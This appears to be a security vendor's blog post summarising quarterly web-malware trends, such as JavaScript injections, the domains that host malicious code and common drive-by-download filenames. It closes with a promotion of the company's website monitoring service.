If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed for all the latest in web-based malware and general security news.
* Our infection library grew by 58K entries, with relatively more JavaScript injections as compared to IFRAMEs in previous quarters
* Attackers use .com and .cn domains most frequently to host malicious code. There has been a rise in .info domains being infected and used to host malicious code.
* Three out of four drive-by-downloads have one letter filenames and are written to the User’s Application Data directory. The most common name for a drive-by-download was f.exe.
Hackers are going to continue to become more sophisticated. The malware epidemic is not slowing down - on the contrary, it’s exploding. Now is the time for businesses to educate themselves on how they can put safe security practices in place for their websites to protect their customers, their brand and their revenue. The first step is to make sure they are not exposed by monitoring their websites for malware regularly.
If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed for all the latest in web-based malware and general security news.
Keep your sites safe!
Your Dasient Team
Subscribe to:
Posts (Atom)